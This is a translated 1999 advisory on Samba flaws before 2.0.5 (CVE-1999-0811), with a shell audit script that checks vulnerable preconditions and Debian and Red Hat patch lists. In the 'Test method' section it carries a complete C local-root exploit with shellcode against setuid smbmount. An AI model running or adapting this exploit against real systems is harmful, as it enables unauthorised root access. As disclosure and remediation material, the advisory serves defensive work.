Multiple Remote Vulnerabilities in the Linux Samba Package

Published: 1999-07-21
Updated: 1999-07-21

Affected systems:
Samba Samba 2.0.4
    - Debian Linux 2.1
    - RedHat Linux 6.0
    - RedHat Linux 5.2
    - RedHat Linux 4.2
Unaffected systems:
Samba Samba 2.0.5
    - Caldera  eServer 2.3.1
    - Caldera OpenLinux 2.3
Description:
BUGTRAQ ID: 536
CVE(CAN) ID: CVE-1999-0811

Samba is a program that provides NetBIOS services on Unix-like servers. With the Samba package, files can be shared conveniently between Unix and Windows hosts.

Versions of the Samba package prior to 2.0.5 contain multiple security vulnerabilities. The first is a denial-of-service vulnerability in nmbd. The second is a buffer overflow in smbd; it is not exploitable in a default installation, but if the system administrator has set the "message command" option in smb.conf, an attacker may be able to exploit it to obtain root privileges remotely. The third is a race condition: if the smbmnt program is installed setuid root, an attacker may be able to exploit it to mount on any directory in the file system.
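An added audit helper, not part of the advisory or of Samba, that checks the locally visible preconditions the description names: a Samba version below 2.0.5, an active "message command" line in smb.conf, and a setuid smbmnt/smbmount binary. The smb.conf contents and the stand-in binary in the demo are constructed; the real paths on a host are passed as parameters.

```shell
#!/bin/sh
# Added audit helper (not part of the advisory): checks the locally visible
# preconditions the advisory names for Samba < 2.0.5. All paths are
# parameters; the demo below uses constructed files only.

# 0 if VERSION (e.g. "2.0.4", "2.0.5a") is below 2.0.5, the fixed release.
samba_version_vulnerable() {
    v=$(printf '%s' "$1" | sed 's/[^0-9.].*//').0.0   # drop "a" suffix, pad
    maj=${v%%.*}; rest=${v#*.}; min=${rest%%.*}; rest=${rest#*.}; pat=${rest%%.*}
    [ $((maj * 10000 + min * 100 + pat)) -lt 20005 ]
}

# 0 if FILE has an active (uncommented) "message command" line in any
# case or spacing Samba's parser would accept; 1 otherwise.
smbconf_has_message_command() {
    sed -e 's/^[[:space:]]*//' -e '/^[#;]/d' "$1" | tr 'A-Z' 'a-z' |
        sed -e 's/[[:space:]]\{1,\}/ /g' -e 's/ *= */=/' |
        grep -q '^message command='
}

# 0 if FILE exists and carries the setuid bit (the advisory's quick fix is
# "chmod -s"); ownership is not checked so the demo runs unprivileged.
setuid_binary() {
    [ -f "$1" ] && [ -u "$1" ]
}

# Print one line per finding; the exit status is the number of findings.
audit_samba() {   # SMBCONF BINARY VERSION
    n=0
    samba_version_vulnerable "$3" &&
        { echo "Samba $3 predates the 2.0.5 fix"; n=$((n + 1)); }
    smbconf_has_message_command "$1" &&
        { echo "'message command' is set in $1: smbd overflow reachable"; n=$((n + 1)); }
    setuid_binary "$2" &&
        { echo "$2 is setuid: smbmnt/smbmount race reachable (chmod -s)"; n=$((n + 1)); }
    return "$n"
}

# Demo on a constructed smb.conf and a constructed stand-in for smbmount.
tmpd=$(mktemp -d); trap 'rm -rf "$tmpd"' EXIT
cat >"$tmpd/smb.conf" <<'EOF'
[global]
   workgroup = EXAMPLE
   ; message command = /bin/mail root < %s ; rm %s
   Message   Command = /bin/sh -c 'cat %s >> /var/log/winpopup; rm %s'
EOF
: >"$tmpd/smbmount"; chmod 4755 "$tmpd/smbmount"
audit_samba "$tmpd/smb.conf" "$tmpd/smbmount" "2.0.4"   # three findings
```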



<*Source: Andrew Tridgell (tridge@samba.org)

  Link: https://www.redhat.com/support/errata/RHSA-1999-022.html
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users bear the risk themselves!

Gerald Britton (gbritton@nih.gov) provided the following test program:


/*
The default parameters to the program
often work, however I have found that the offset parameter sometimes
varies wildly, values between -600 and -100 usually work though, a quick
shell script will scan through these.
*/

/*
** smbexpl -- a smbmount root exploit under Linux
**
** Author: Gerald Britton <gbritton@nih.gov>
**
** This code exploits a buffer overflow in smbmount from smbfs-2.0.1.
** The code does not do range checking when copying a username from
** the environment variables USER or LOGNAME.  To get this far into
** the code we need to execute with dummy arguments of a server and a
** mountpoint to use (./a in this case).  The user will need to create
** the ./a directory and then execute smbexpl to gain root.  This code
** is also setup to use /tmp/sh as the shell as bash-2.01 appears to
** do a seteuid(getuid()) so /bin/sh on my system won't work.  Finally
** a "-Q" (an invalid commandline argument) causes smbmount to fail when
** parsing args and terminate, thus jumping into our shellcode.
**
** The shellcode used in this program also needed to be specialized as
** smbmount toupper()'s the contents of the USER variable.  Self modifying
** code was needed to ensure that the shellcode will survive toupper().
**
** The quick fix for the security problem:
**          chmod -s /sbin/smbmount
**
** A better fix would be to patch smbmount to do bounds checking when
** copying the contents of the USER and LOGNAME variables.
**
*/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>   /* strlen */
#include <unistd.h>   /* execl */

#define DEFAULT_OFFSET                 -202
#define DEFAULT_BUFFER_SIZE             211
#define DEFAULT_ALIGNMENT                 2
#define NOP                            0x90

/* This shell code is designed to survive being filtered by toupper() */

char shellcode[] =
        "\xeb\x20\x5e\x8d\x46\x05\x80\x08\x20\x8d\x46\x27\x80\x08\x20\x40"
        "\x80\x08\x20\x40\x80\x08\x20\x40\x40\x80\x08\x20\x40\x80\x08\x20"
        "\xeb\x05\xe8\xdb\xff\xff\xff"
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/tmp/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int alignment=DEFAULT_ALIGNMENT;
  int i;

  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);
  if (argc > 3) alignment = atoi(argv[3]);
  printf("bsize=%d offset=%d alignment=%d\n",bsize,offset,alignment);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_sp() - offset;
  fprintf(stderr,"Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) (ptr+alignment);
  for (i = 0; i < bsize-alignment; i+=4)
    *(addr_ptr++) = addr;

  for (i = 0; i < bsize/2; i++)
    buff[i] = NOP;

  ptr = buff + (128 - strlen(shellcode));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  setenv("USER",buff,1);
  execl("/sbin/smbmount","smbmount","//a/a","./a","-Q",(char *)0);
  return 1;  /* only reached if execl fails */
}

Recommendations:
Vendor patches:

Debian
------
The vendor has released an upgrade patch to fix this security issue; please download it from the vendor's site:

    Source code:

http://security.debian.org/dists/stable/updates/source/samba_2.0.5a-1.diff.gz
       MD5 checksum: 1354ea63f79e7fa0b4b71685dbac118b
     http://security.debian.org/dists/stable/updates/source/samba_2.0.5a-1.dsc
       MD5 checksum: e51aeb259913179b60dbddd0b9e70bf5

http://security.debian.org/dists/stable/updates/source/samba_2.0.5a.orig.tar.gz
       MD5 checksum: 497e5f98ed9b520b18e926ff2f7307ba


   Alpha architecture:

http://security.debian.org/dists/stable/updates/binary-alpha/samba-common_2.0.5a-1_alpha.deb
       MD5 checksum: 48b9651e2cefd6f6ad820ded9ebc9191

http://security.debian.org/dists/stable/updates/binary-alpha/samba_2.0.5a-1_alpha.deb
       MD5 checksum: 9bb86e810254fe59feb02e817815b64f

http://security.debian.org/dists/stable/updates/binary-alpha/smbclient_2.0.5a-1_alpha.deb
       MD5 checksum: 54a89ad98e1167a3265ff30881618b3f

http://security.debian.org/dists/stable/updates/binary-alpha/smbfs_2.0.5a-1_alpha.deb
       MD5 checksum: 596e22cdf0848fcffd1885f16b38cf83

http://security.debian.org/dists/stable/updates/binary-alpha/smbwrapper_2.0.5a-1_alpha.deb
       MD5 checksum: 5003fb2a3555daddd3d877529ac65e1e

http://security.debian.org/dists/stable/updates/binary-alpha/swat_2.0.5a-1_alpha.deb
       MD5 checksum: e99ec78abdac4a8ab1348773e3fa32cd

   Intel ia32 architecture:

http://security.debian.org/dists/stable/updates/binary-i386/samba-common_2.0.5a-1_i386.deb
       MD5 checksum: eb8b9aa964912975db301f1e83919d36

http://security.debian.org/dists/stable/updates/binary-i386/samba_2.0.5a-1_i386.deb
       MD5 checksum: 799ab1a56dd726548c33a130edfb9231

http://security.debian.org/dists/stable/updates/binary-i386/smbclient_2.0.5a-1_i386.deb
       MD5 checksum: f5db7b12b67b24048d7ff915c9ec77ee

http://security.debian.org/dists/stable/updates/binary-i386/smbfs_2.0.5a-1_i386.deb
       MD5 checksum: b6e90edf5db22cf3952a01f726cb7dd7

http://security.debian.org/dists/stable/updates/binary-i386/smbwrapper_2.0.5a-1_i386.deb
       MD5 checksum: afabbae0e5ffdd03475a302586d75be5

http://security.debian.org/dists/stable/updates/binary-i386/swat_2.0.5a-1_i386.deb
       MD5 checksum: bd235e608944c7cd3cc7a17fceab0199

   Motorola 680x0 architecture:

http://security.debian.org/dists/stable/updates/binary-m68k/samba-common_2.0.5a-1_m68k.deb
       MD5 checksum: 91d8b04d9ef76ca08fff5938007eb235

http://security.debian.org/dists/stable/updates/binary-m68k/samba_2.0.5a-1_m68k.deb
       MD5 checksum: 6404ca678a20ad17e44b6c74cc3182a1

http://security.debian.org/dists/stable/updates/binary-m68k/smbclient_2.0.5a-1_m68k.deb
       MD5 checksum: 37f0a04da50f9880b22cb3eaf27b2794

http://security.debian.org/dists/stable/updates/binary-m68k/smbfs_2.0.5a-1_m68k.deb
       MD5 checksum: 3685040bee6e01039f6588f97dab2c26

http://security.debian.org/dists/stable/updates/binary-m68k/smbwrapper_2.0.5a-1_m68k.deb
       MD5 checksum: 1a43221c50137cbf5d94f7ad90ab548e

http://security.debian.org/dists/stable/updates/binary-m68k/swat_2.0.5a-1_m68k.deb
       MD5 checksum: 7b5e610c9b044fe81ac66881ea59af64

   Sun SPARC architecture:

http://security.debian.org/dists/stable/updates/binary-sparc/samba-common_2.0.5a-1_sparc.deb
       MD5 checksum: f4713291f719de2f32543e0fc37506ea

http://security.debian.org/dists/stable/updates/binary-sparc/samba_2.0.5a-1_sparc.deb
       MD5 checksum: afb22260c07c60e4afd390bb3e108674

http://security.debian.org/dists/stable/updates/binary-sparc/smbclient_2.0.5a-1_sparc.deb
       MD5 checksum: 28b22378ddb79b05d29b4b4fac2038c4

http://security.debian.org/dists/stable/updates/binary-sparc/smbfs_2.0.5a-1_sparc.deb
       MD5 checksum: 8747b52257b451a1e19c93ea10048369

http://security.debian.org/dists/stable/updates/binary-sparc/smbwrapper_2.0.5a-1_sparc.deb
       MD5 checksum: 420bfe236fcc1591175acd7eb3ad83e0

http://security.debian.org/dists/stable/updates/binary-sparc/swat_2.0.5a-1_sparc.deb
       MD5 checksum: 38380d76284421c18e557e2d3a413a62

RedHat
------
RedHat has released a security advisory (RHSA-1999:022-02) and the corresponding patches:
RHSA-1999:022-02:New Samba packages for Red Hat Linux 4.2, 5.2, 6.0
Link: https://www.redhat.com/support/errata/RHSA-1999-022.html

Patch downloads:

Intel:

ftp://updates.redhat.com/6.0/i386/

samba-2.0.5a-1.i386.rpm
samba-client-2.0.5a-1.i386.rpm


Alpha:

ftp://updates.redhat.com/6.0/alpha/

samba-2.0.5a-1.alpha.rpm
samba-client-2.0.5a-1.alpha.rpm


SPARC:

ftp://updates.redhat.com/6.0/sparc/

samba-2.0.5a-1.sparc.rpm
samba-client-2.0.5a-1.sparc.rpm

The patches can be installed with the following command:

rpm -Fvh [filename]

This vulnerability entry was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.